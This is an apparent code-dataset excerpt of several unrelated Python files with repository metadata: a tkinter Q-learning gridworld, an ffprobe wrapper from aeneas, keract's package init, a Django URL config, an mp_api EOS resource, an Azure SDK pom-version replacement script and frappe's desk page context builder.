        self.triangle1 = canvas.create_image(250, 150, image=self.shapes[1])
        self.triangle2 = canvas.create_image(150, 250, image=self.shapes[1])
        self.circle = canvas.create_image(250, 250, image=self.shapes[2])
        # pack all
        canvas.pack()
        return canvas
    def load_images(self):
        """Load and resize the three sprite images used on the canvas."""
        rectangle = PhotoImage(
            Image.open("../img/rectangle.png").resize((65, 65)))
        triangle = PhotoImage(
            Image.open("../img/triangle.png").resize((65, 65)))
        circle = PhotoImage(
            Image.open("../img/circle.png").resize((65, 65)))
        return rectangle, triangle, circle
    def text_value(self, row, col, contents, action, font='Helvetica', size=10,
                   style='normal', anchor="nw"):
        """Draw one q-value label inside cell (row, col).

        The (origin_x, origin_y) offsets place the label on the edge of
        the cell matching the action: 0=left, 1=right, 2=up, 3=down.
        """
        if action == 0:
            origin_x, origin_y = 7, 42
        elif action == 1:
            origin_x, origin_y = 85, 42
        elif action == 2:
            origin_x, origin_y = 42, 5
        else:
            origin_x, origin_y = 42, 77
        x, y = origin_y + (UNIT * col), origin_x + (UNIT * row)
        font = (font, str(size), style)
        text = self.canvas.create_text(x, y, fill="black", text=contents,
                                       font=font, anchor=anchor)
        # list.append returns None, so this method effectively returns None.
        return self.texts.append(text)
    def print_value_all(self, q_table):
        """Redraw all q-values from q_table on the grid."""
        # Remove the labels from the previous redraw first.
        for i in self.texts:
            self.canvas.delete(i)
        self.texts.clear()
        for x in range(HEIGHT):
            for y in range(WIDTH):
                for action in range(0, 4):
                    state = [x, y]
                    if str(state) in q_table.keys():
                        temp = q_table[str(state)][action]
                        self.text_value(y, x, round(temp, 2), action)
    def coords_to_state(self, coords):
        """Convert canvas pixel coordinates (cell centers) to [col, row]."""
        x = int((coords[0] - 50) / 100)
        y = int((coords[1] - 50) / 100)
        return [x, y]
    def reset(self):
        """Move the agent back to the top-left cell and return its state."""
        self.update()
        time.sleep(0.5)
        x, y = self.canvas.coords(self.rectangle)
        self.canvas.move(self.rectangle, UNIT / 2 - x, UNIT / 2 - y)
        self.render()
        # return observation
        return self.coords_to_state(self.canvas.coords(self.rectangle))
    def step(self, action):
        """Apply an action (0=up, 1=down, 2=left, 3=right).

        Returns (next_state, reward, done). Moves that would leave the
        grid are ignored (the agent stays in place).
        """
        state = self.canvas.coords(self.rectangle)
        base_action = np.array([0, 0])
        self.render()
        if action == 0:  # up
            if state[1] > UNIT:
                base_action[1] -= UNIT
        elif action == 1:  # down
            if state[1] < (HEIGHT - 1) * UNIT:
                base_action[1] += UNIT
        elif action == 2:  # left
            if state[0] > UNIT:
                base_action[0] -= UNIT
        elif action == 3:  # right
            if state[0] < (WIDTH - 1) * UNIT:
                base_action[0] += UNIT
        # move agent
        self.canvas.move(self.rectangle, base_action[0], base_action[1])
        # move rectangle to top level of canvas
        self.canvas.tag_raise(self.rectangle)
        next_state = self.canvas.coords(self.rectangle)
        # reward function
        if next_state == self.canvas.coords(self.circle):
            reward = 100
            done = True
        elif next_state in [self.canvas.coords(self.triangle1),
                            self.canvas.coords(self.triangle2)]:
            reward = -100
            done = True
        else:
            reward = 0
            done = False
        next_state = self.coords_to_state(next_state)
        return next_state, reward, done
    def render(self):
        """Throttle to ~30 fps and process pending tkinter events."""
        time.sleep(0.03)
        self.update()
| 33.58042 | 79 | 0.533736 |
acf6d97d8dbbd1579935b13c9a7136c13c7bff4d | 10,379 | py | Python | Aeneas/aeneas/aeneas/ffprobewrapper.py | yalhaizaey/Dreich | 9528856c3879d4c9d3ced453f223785a71188808 | [
"Apache-2.0"
] | 25 | 2019-05-09T19:03:37.000Z | 2022-02-06T20:47:37.000Z | Experiments/Aeneas/aeneas/aeneas/ffprobewrapper.py | jonathanmcchesney/DeFog | bc314d41471d00b9d605bb4519f31a465e0a6b75 | [
"Apache-2.0"
] | null | null | null | Experiments/Aeneas/aeneas/aeneas/ffprobewrapper.py | jonathanmcchesney/DeFog | bc314d41471d00b9d605bb4519f31a465e0a6b75 | [
"Apache-2.0"
] | 9 | 2019-08-19T19:00:41.000Z | 2021-12-09T04:46:07.000Z | #!/usr/bin/env python
# coding=utf-8
# aeneas is a Python/C library and a set of tools
# to automagically synchronize audio and text (aka forced alignment)
#
# Copyright (C) 2012-2013, Alberto Pettarin (www.albertopettarin.it)
# Copyright (C) 2013-2015, ReadBeyond Srl (www.readbeyond.it)
# Copyright (C) 2015-2017, Alberto Pettarin (www.albertopettarin.it)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
This module contains the following classes:
* :class:`~aeneas.ffprobewrapper.FFPROBEWrapper`, a wrapper around ``ffprobe`` to read the properties of an audio file;
* :class:`~aeneas.ffprobewrapper.FFPROBEParsingError`,
* :class:`~aeneas.ffprobewrapper.FFPROBEPathError`, and
* :class:`~aeneas.ffprobewrapper.FFPROBEUnsupportedFormatError`,
representing errors while reading the properties of audio files.
"""
from __future__ import absolute_import
from __future__ import print_function
import re
import subprocess
from aeneas.exacttiming import TimeValue
from aeneas.logger import Loggable
from aeneas.runtimeconfiguration import RuntimeConfiguration
import aeneas.globalfunctions as gf
class FFPROBEParsingError(Exception):
    """
    Error raised when the call to ``ffprobe`` does not produce any output,
    or its output cannot be decoded.
    """
    pass
class FFPROBEPathError(Exception):
    """
    Error raised when the path to ``ffprobe`` is not a valid executable.
    .. versionadded:: 1.4.1
    """
    pass
class FFPROBEUnsupportedFormatError(Exception):
    """
    Error raised when ``ffprobe`` cannot decode the format of the given file.
    """
    pass
class FFPROBEWrapper(Loggable):
    """
    Wrapper around ``ffprobe`` to read the properties of an audio file.
    It will perform a call like::
        $ ffprobe -select_streams a -show_streams /path/to/audio/file.mp3
    and it will parse the first ``[STREAM]`` element returned::
        [STREAM]
        index=0
        codec_name=mp3
        codec_long_name=MP3 (MPEG audio layer 3)
        sample_rate=44100
        channels=1
        duration=109.487188
        ...
        [/STREAM]
    :param rconf: a runtime configuration
    :type rconf: :class:`~aeneas.runtimeconfiguration.RuntimeConfiguration`
    :param logger: the logger object
    :type logger: :class:`~aeneas.logger.Logger`
    """
    FFPROBE_PARAMETERS = [
        "-select_streams",
        "a",
        "-show_streams"
    ]
    """ ``ffprobe`` parameters """
    STDERR_DURATION_REGEX = re.compile(r"Duration: ([0-9]*):([0-9]*):([0-9]*)\.([0-9]*)")
    """ Regex to match ``ffprobe`` stderr duration values """
    STDOUT_BEGIN_STREAM = "[STREAM]"
    """ ``ffprobe`` stdout begin stream tag """
    STDOUT_CHANNELS = "channels"
    """ ``ffprobe`` stdout channels keyword """
    STDOUT_CODEC_NAME = "codec_name"
    """ ``ffprobe`` stdout codec name (format) keyword """
    STDOUT_END_STREAM = "[/STREAM]"
    """ ``ffprobe`` stdout end stream tag """
    STDOUT_DURATION = "duration"
    """ ``ffprobe`` stdout duration keyword """
    STDOUT_SAMPLE_RATE = "sample_rate"
    """ ``ffprobe`` stdout sample rate keyword """
    TAG = u"FFPROBEWrapper"
    def read_properties(self, audio_file_path):
        """
        Read the properties of an audio file
        and return them as a dictionary,
        keyed by the ``ffprobe`` stream property names
        (e.g. ``codec_name``, ``sample_rate``, ``channels``, ``duration``).
        :param string audio_file_path: the path of the audio file to analyze
        :rtype: dict
        :raises: TypeError: if ``audio_file_path`` is None
        :raises: OSError: if the file at ``audio_file_path`` cannot be read
        :raises: FFPROBEParsingError: if the call to ``ffprobe`` does not produce any output
        :raises: FFPROBEPathError: if the path to the ``ffprobe`` executable cannot be called
        :raises: FFPROBEUnsupportedFormatError: if the file has a format not supported by ``ffprobe``
        """
        # test if we can read the file at audio_file_path
        if audio_file_path is None:
            self.log_exc(u"The audio file path is None", None, True, TypeError)
        if not gf.file_can_be_read(audio_file_path):
            self.log_exc(u"Input file '%s' cannot be read" % (audio_file_path), None, True, OSError)
        # call ffprobe
        arguments = [self.rconf[RuntimeConfiguration.FFPROBE_PATH]]
        arguments.extend(self.FFPROBE_PARAMETERS)
        arguments.append(audio_file_path)
        self.log([u"Calling with arguments '%s'", arguments])
        try:
            proc = subprocess.Popen(
                arguments,
                stdout=subprocess.PIPE,
                stdin=subprocess.PIPE,
                stderr=subprocess.PIPE
            )
            (stdoutdata, stderrdata) = proc.communicate()
            proc.stdout.close()
            proc.stdin.close()
            proc.stderr.close()
        except OSError as exc:
            self.log_exc(u"Unable to call the '%s' ffprobe executable" % (self.rconf[RuntimeConfiguration.FFPROBE_PATH]), exc, True, FFPROBEPathError)
        self.log(u"Call completed")
        # check there is some output
        # NOTE(review): this tests stdout for None but stderr for emptiness;
        # the asymmetry looks suspicious -- confirm against ffprobe behavior.
        if (stdoutdata is None) or (len(stderrdata) == 0):
            self.log_exc(u"ffprobe produced no output", None, True, FFPROBEParsingError)
        # decode stdoutdata and stderrdata to Unicode string
        try:
            stdoutdata = gf.safe_unicode(stdoutdata)
            stderrdata = gf.safe_unicode(stderrdata)
        except UnicodeDecodeError as exc:
            self.log_exc(u"Unable to decode ffprobe out/err", exc, True, FFPROBEParsingError)
        # dictionary for the results
        results = {
            self.STDOUT_CHANNELS: None,
            self.STDOUT_CODEC_NAME: None,
            self.STDOUT_DURATION: None,
            self.STDOUT_SAMPLE_RATE: None
        }
        # scan the first audio stream the ffprobe stdout output
        # TODO more robust parsing
        # TODO deal with multiple audio streams
        for line in stdoutdata.splitlines():
            if line == self.STDOUT_END_STREAM:
                self.log(u"Reached end of the stream")
                break
            elif len(line.split("=")) == 2:
                key, value = line.split("=")
                results[key] = value
                self.log([u"Found property '%s'='%s'", key, value])
        try:
            self.log([u"Duration found in stdout: '%s'", results[self.STDOUT_DURATION]])
            results[self.STDOUT_DURATION] = TimeValue(results[self.STDOUT_DURATION])
            self.log(u"Valid duration")
        except Exception:
            # Fix: was a bare `except:`, which would also swallow
            # SystemExit and KeyboardInterrupt. TimeValue() may raise for
            # values such as None or "N/A".
            self.log_warn(u"Invalid duration")
            results[self.STDOUT_DURATION] = None
        # try scanning ffprobe stderr output
        for line in stderrdata.splitlines():
            match = self.STDERR_DURATION_REGEX.search(line)
            if match is not None:
                self.log([u"Found matching line '%s'", line])
                results[self.STDOUT_DURATION] = gf.time_from_hhmmssmmm(line)
                self.log([u"Extracted duration '%.3f'", results[self.STDOUT_DURATION]])
                break
        if results[self.STDOUT_DURATION] is None:
            self.log_exc(u"No duration found in stdout or stderr. Unsupported audio file format?", None, True, FFPROBEUnsupportedFormatError)
        # return dictionary
        self.log(u"Returning dict")
        return results
| 35.913495 | 150 | 0.612968 |
acf6db9794d44925d3cb8294a5c9fc474e500a4a | 736 | py | Python | keract/__init__.py | jimypeter/keract | fef88628f92ae412c35df7e33c65660d7a3eb584 | [
"MIT"
] | 1 | 2021-05-27T11:57:22.000Z | 2021-05-27T11:57:22.000Z | keract/__init__.py | jimypeter/keract | fef88628f92ae412c35df7e33c65660d7a3eb584 | [
"MIT"
] | null | null | null | keract/__init__.py | jimypeter/keract | fef88628f92ae412c35df7e33c65660d7a3eb584 | [
"MIT"
# Fix: `import importlib` alone does not guarantee the `util` submodule
# is loaded; import it explicitly so `importlib.util.find_spec` is
# always available.
import importlib.util

# Fail fast with a clear message if TensorFlow is not installed.
tf_spec = importlib.util.find_spec("tensorflow")
if tf_spec is None:
    raise ImportError("No valid tensorflow installation found. Please install "
                      "tensorflow>=2.0 or tensorflow-gpu>=2.0")

# Public API re-exports.
from keract.keract import display_activations # noqa
from keract.keract import display_gradients_of_trainable_weights # noqa
from keract.keract import display_heatmaps # noqa
from keract.keract import get_activations # noqa
from keract.keract import get_gradients_of_activations # noqa
from keract.keract import get_gradients_of_trainable_weights # noqa
from keract.keract import load_activations_from_json_file # noqa
from keract.keract import persist_to_json_file # noqa

__version__ = '4.3.2'
| 40.888889 | 79 | 0.793478 |
acf6dcd2128ec850651e8f4ffef88dc4349c8198 | 798 | py | Python | chatty/urls.py | BOVAGE/chatty | 745bf0d40926def87612d9ab24eb710353ed5e17 | [
"MIT"
] | null | null | null | chatty/urls.py | BOVAGE/chatty | 745bf0d40926def87612d9ab24eb710353ed5e17 | [
"MIT"
] | null | null | null | chatty/urls.py | BOVAGE/chatty | 745bf0d40926def87612d9ab24eb710353ed5e17 | [
"MIT"
] | null | null | null | """chatty URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/4.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
# Project-level routes: the Django admin site plus the chat app's own URLconf
# (everything under /chat/ is delegated to chat.urls).
urlpatterns = [
    path('admin/', admin.site.urls),
    path('chat/', include('chat.urls')),
]
| 34.695652 | 77 | 0.701754 |
acf6dce03762ee63bc992c5ec21d3d7e57047c0a | 555 | py | Python | src/mp_api/eos/resources.py | jmmshn/api | 5254a453f6ec749793639e4ec08bea14628c7dc3 | [
"BSD-3-Clause-LBNL"
] | null | null | null | src/mp_api/eos/resources.py | jmmshn/api | 5254a453f6ec749793639e4ec08bea14628c7dc3 | [
"BSD-3-Clause-LBNL"
] | 159 | 2020-11-16T16:02:31.000Z | 2022-03-28T15:03:38.000Z | src/mp_api/eos/resources.py | jmmshn/api | 5254a453f6ec749793639e4ec08bea14628c7dc3 | [
"BSD-3-Clause-LBNL"
] | null | null | null | from mp_api.core.resource import Resource
from mp_api.eos.models import EOSDoc
from mp_api.core.query_operator import PaginationQuery, SortQuery, SparseFieldsQuery
from mp_api.eos.query_operators import EnergyVolumeQuery
def eos_resource(eos_store):
    """Build the API Resource serving equation-of-state documents from *eos_store*."""
    operators = [
        EnergyVolumeQuery(),
        SortQuery(),
        PaginationQuery(),
        SparseFieldsQuery(EOSDoc, default_fields=["task_id"]),
    ]
    return Resource(
        eos_store,
        EOSDoc,
        query_operators=operators,
        tags=["EOS"],
    )
| 25.227273 | 84 | 0.664865 |
acf6dd9ebe10b7e8c57c9169429b632ec3a73203 | 7,728 | py | Python | sdk/spring/scripts/replace_util.py | waynemo/azure-sdk-for-java | 76aebf62380d90052ed9bd3416ea02615d3f5aa0 | [
"MIT"
] | null | null | null | sdk/spring/scripts/replace_util.py | waynemo/azure-sdk-for-java | 76aebf62380d90052ed9bd3416ea02615d3f5aa0 | [
"MIT"
] | null | null | null | sdk/spring/scripts/replace_util.py | waynemo/azure-sdk-for-java | 76aebf62380d90052ed9bd3416ea02615d3f5aa0 | [
"MIT"
] | null | null | null | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
import argparse
import os
import time
import in_place
from log import log, Log
from artifact_id_pair import ArtifactIdPair
from version_update_item import VersionUpdateItem
# pom.xml inline markers: lines tagged 'x-version-update' get their
# <version> tag rewritten; lines tagged 'x-include-update' get their
# [version] include range rewritten (see replace_version below).
X_VERSION_UPDATE = 'x-version-update'
X_INCLUDE_UPDATE = 'x-include-update'
# Keys of the per-pom parameter dicts inside ``config``.
ARTIFACT_ID_PAIRS = 'artifact_id_pairs'
VERSION_UPDATE_ITEMS = 'version_update_items'
# module name -> {pom file path (repo-relative) -> replacement parameters}
config = {
    'cosmos': {
        'sdk/cosmos/azure-spring-data-cosmos-test/pom.xml': {
            VERSION_UPDATE_ITEMS: (
                VersionUpdateItem('org.springframework.boot:spring-boot-starter-parent', '2.2.10.RELEASE'),
            )
        }
    },
    'spring': {
        'sdk/spring/azure-spring-boot-test-core/pom.xml': {
            VERSION_UPDATE_ITEMS: (
                VersionUpdateItem('org.springframework.boot:spring-boot-starter-parent', '2.2.9.RELEASE'),
            )
        },
        'sdk/spring/azure-spring-boot-test-aad/pom.xml': {
            VERSION_UPDATE_ITEMS: (
                VersionUpdateItem('org.springframework.boot:spring-boot-starter-parent', '2.2.9.RELEASE'),
            )
        },
        'sdk/spring/azure-spring-boot-test-application/pom.xml': {
            VERSION_UPDATE_ITEMS: (
                VersionUpdateItem('org.springframework.boot:spring-boot-starter-parent', '2.2.9.RELEASE'),
            )
        },
        'sdk/spring/azure-spring-boot-test-cosmos/pom.xml': {
            VERSION_UPDATE_ITEMS: (
                VersionUpdateItem('org.springframework.boot:spring-boot-starter-parent', '2.2.9.RELEASE'),
            )
        },
        'sdk/spring/azure-spring-boot-test-keyvault/pom.xml': {
            VERSION_UPDATE_ITEMS: (
                VersionUpdateItem('org.springframework.boot:spring-boot-starter-parent', '2.2.9.RELEASE'),
            )
        },
        'sdk/spring/azure-spring-boot-test-servicebus-jms/pom.xml': {
            VERSION_UPDATE_ITEMS: (
                VersionUpdateItem('org.springframework.boot:spring-boot-starter-parent', '2.2.9.RELEASE'),
            )
        }
    }
}
def main():
    """Entry point: move to the repo root, parse CLI options, configure
    logging, run the pom replacements, and report elapsed time."""
    started = time.time()
    change_to_root_dir()
    log.debug('Current working directory = {}.'.format(os.getcwd()))
    cli_args = get_args()
    init_log(cli_args)
    replace(cli_args.module)
    elapsed = time.time() - started
    log.info('elapsed_time = {}'.format(elapsed))
def change_to_root_dir():
    """Make the repository root — three levels above this script — the cwd."""
    script_dir = os.path.dirname(os.path.realpath(__file__))
    os.chdir(os.path.join(script_dir, '..', '..', '..'))
def get_args():
    """Parse and return this script's command-line options.

    Options: --module (spring|cosmos, default cosmos), --log (level name,
    default info) and --color (true|false, default true).
    """
    parser = argparse.ArgumentParser(description='Replace artifact id in pom file.')
    parser.add_argument('--module', type=str, choices=['spring', 'cosmos'],
                        required=False, default='cosmos',
                        help='Specify the target module.')
    parser.add_argument('--log', type=str,
                        choices=['debug', 'info', 'warn', 'error', 'none'],
                        required=False, default='info',
                        help='Set log level.')
    parser.add_argument('--color', type=str, choices=['true', 'false'],
                        required=False, default='true',
                        help='Whether need colorful log.')
    return parser.parse_args()
def init_log(args):
    """Apply the parsed --log and --color options to the global logger."""
    level_by_name = {
        'debug': Log.DEBUG,
        'info': Log.INFO,
        'warn': Log.WARN,
        'error': Log.ERROR,
        'none': Log.NONE,
    }
    log.set_log_level(level_by_name[args.log])
    # Choices are restricted by argparse; any other value raises KeyError.
    color_by_name = {'true': True, 'false': False}
    log.set_color(color_by_name[args.color])
def replace(module):
    """Run artifact-id and version replacement over every pom configured
    for *module*.

    :param module: module name (top-level key of the global ``config``)
    """
    for pom_path in config[module]:
        replace_artifact_id(module, pom_path)
        replace_version(module, pom_path)
def get_str(tuple_obj):
    """
    Return the items of an iterable converted to strings, for logging.

    :param tuple_obj: tuple (or any iterable) of objects
    :return: list containing str(item) for every item
    """
    # A comprehension replaces the manual append loop — same result, clearer.
    return [str(item) for item in tuple_obj]
def replace_artifact_id(module, pom):
    """
    Rewrite *pom* in place, swapping every configured old artifactId for
    its replacement (dependency and plugin sections alike).

    :param module: module name (top-level key of the global ``config``)
    :param pom: pom file path
    """
    log.debug('Replacing artifact id in file: {}'.format(pom, module))
    pom_dict = config[module][pom]
    if ARTIFACT_ID_PAIRS not in pom_dict:
        log.warn('No config key {} in pom parameters.'.format(ARTIFACT_ID_PAIRS))
        return
    artifact_id_pairs = pom_dict[ARTIFACT_ID_PAIRS]
    log.debug('Module: {}, artifact ids: {}'.format(module, get_str(artifact_id_pairs)))
    with in_place.InPlace(pom) as file:
        for lineno, line in enumerate(file, start=1):
            for pair in artifact_id_pairs:
                if pair.old_artifact_id in line:
                    updated = line.replace(pair.old_artifact_id, pair.new_artifact_id)
                    log.debug('Updating artifact id in line {}'.format(lineno))
                    log.debug('    old_line = {}.'.format(line.strip('\n')))
                    log.debug('    new_line = {}.'.format(updated.strip('\n')))
                    line = updated
            file.write(line)
def replace_version(module, pom):
    """
    Replace version in dependency and plugin part.

    Only lines carrying a marker comment are touched: 'x-version-update'
    flags a dependency <version> tag, 'x-include-update' flags a plugin
    include range like [1.2.3]. Every other line is written back as-is.
    :param module: module name
    :param pom: pom file path
    """
    log.debug('Replacing version in file: {}'.format(pom))
    pom_dict = config[module][pom]
    if VERSION_UPDATE_ITEMS not in pom_dict:
        log.warn('No config key {} in pom parameters.'.format(VERSION_UPDATE_ITEMS))
        return
    version_update_items = pom_dict[VERSION_UPDATE_ITEMS]
    log.debug('Module: {}, versions: {}'.format(module, get_str(version_update_items)))
    with in_place.InPlace(pom) as file:
        line_num = 0
        for line in file:
            line_num = line_num + 1
            for version_update_item in version_update_items:
                if version_update_item.id in line:
                    # update version in dependency part
                    if X_VERSION_UPDATE in line:
                        # 9 == len('<version>'): slice the text between the tags
                        old_version = line[(line.index('<version>') + 9):line.index('</version>')]
                        if old_version != version_update_item.new_version:
                            new_line = line.replace(old_version, version_update_item.new_version)
                            log.debug('Updating version of dependency in line {}'.format(line_num))
                            log.debug('    old_line = {}.'.format(line.strip('\n')))
                            log.debug('    new_line = {}.'.format(new_line.strip('\n')))
                            line = new_line
                        else:
                            log.warn('The same with new version in dependency part.')
                    # update version in plugin part
                    elif X_INCLUDE_UPDATE in line:
                        # slice the version out of the '[...]' include range
                        old_version = line[(line.index('[') + 1):line.index(']')]
                        if old_version != version_update_item.new_version:
                            new_line = line.replace(old_version, version_update_item.new_version)
                            log.debug('Updating line {}'.format(line_num))
                            log.debug('    old_line = {}.'.format(line.strip('\n')))
                            log.debug('    new_line = {}.'.format(new_line.strip('\n')))
                            line = new_line
                        else:
                            log.warn('The same with new version in plugin part.')
            # unchanged or rewritten, the line is always written back
            file.write(line)
if __name__ == '__main__':
main() | 34.810811 | 111 | 0.575958 |
acf6dde00059801efca98c336d62ad92aaf80348 | 2,831 | py | Python | frappe/www/app.py | ssuda777/frappe | d3f3df2ce15154aecc1d9d6d07d947e72c2e8c6e | [
"MIT"
] | 1 | 2021-06-11T10:28:07.000Z | 2021-06-11T10:28:07.000Z | frappe/www/app.py | JMBodz/frappe | eb218a06d1cbfc3a8f1cc00ba8dac2c927d2f71d | [
"MIT"
] | 3 | 2021-08-23T15:20:28.000Z | 2022-03-27T07:47:36.000Z | frappe/www/app.py | JMBodz/frappe | eb218a06d1cbfc3a8f1cc00ba8dac2c927d2f71d | [
"MIT"
] | 1 | 2021-08-03T07:12:43.000Z | 2021-08-03T07:12:43.000Z | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
no_cache = 1
import os, re
import frappe
from frappe import _
import frappe.sessions
from frappe.utils.jinja_globals import is_rtl
def get_context(context):
	"""Populate and return the template context for the desk (/app) page.

	Guests and Website Users are rejected with PermissionError. The boot
	payload comes from the frappe session machinery; failures are reported
	to the client as a 'failed' boot instead of crashing the page.
	"""
	if frappe.session.user == "Guest":
		frappe.throw(_("Log in to access this page."), frappe.PermissionError)
	elif frappe.db.get_value("User", frappe.session.user, "user_type") == "Website User":
		frappe.throw(_("You are not permitted to access this page."), frappe.PermissionError)
	hooks = frappe.get_hooks()
	try:
		boot = frappe.sessions.get()
	except Exception as e:
		# Ship the failure to the client inside the boot payload.
		boot = frappe._dict(status='failed', error = str(e))
		print(frappe.get_traceback())
	# this needs commit
	csrf_token = frappe.sessions.get_csrf_token()
	frappe.db.commit()
	desk_theme = frappe.db.get_value("User", frappe.session.user, "desk_theme")
	boot_json = frappe.as_json(boot)
	# remove script tags from boot
	boot_json = re.sub(r"\<script[^<]*\</script\>", "", boot_json)
	# TODO: Find better fix
	boot_json = re.sub(r"</script\>", "", boot_json)
	context.update({
		"no_cache": 1,
		"build_version": frappe.utils.get_build_version(),
		"include_js": hooks["app_include_js"],
		"include_css": hooks["app_include_css"],
		"layout_direction": "rtl" if is_rtl() else "ltr",
		"lang": frappe.local.lang,
		"sounds": hooks["sounds"],
		# mobile clients get the raw boot dict; browsers get the sanitized JSON
		"boot": boot if context.get("for_mobile") else boot_json,
		"desk_theme": desk_theme or "Light",
		"csrf_token": csrf_token,
		"google_analytics_id": frappe.conf.get("google_analytics_id"),
		"google_analytics_anonymize_ip": frappe.conf.get("google_analytics_anonymize_ip"),
		"mixpanel_id": frappe.conf.get("mixpanel_id")
	})
	return context
@frappe.whitelist()
def get_desk_assets(build_version):
	"""Get desk assets to be loaded for mobile app"""
	data = get_context({"for_mobile": True})
	assets = [{"type": "js", "data": ""}, {"type": "css", "data": ""}]
	if build_version != data["build_version"]:
		# Client build is stale: bundle fresh JS (assets[0]) then CSS (assets[1]).
		for bundle, paths in zip(assets, (data["include_js"], data["include_css"])):
			for path in paths:
				# asset paths must be relative to sites_path, not absolute,
				# as a leading / points to a different location altogether
				if path.startswith('/assets/'):
					path = path.replace('/assets/', 'assets/')
				try:
					with open(os.path.join(frappe.local.sites_path, path), "r") as f:
						bundle["data"] = bundle["data"] + "\n" + frappe.safe_decode(f.read(), "utf-8")
				except IOError:
					pass
	return {
		"build_version": data["build_version"],
		"boot": data["boot"],
		"assets": assets
	}
| 31.455556 | 89 | 0.683504 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.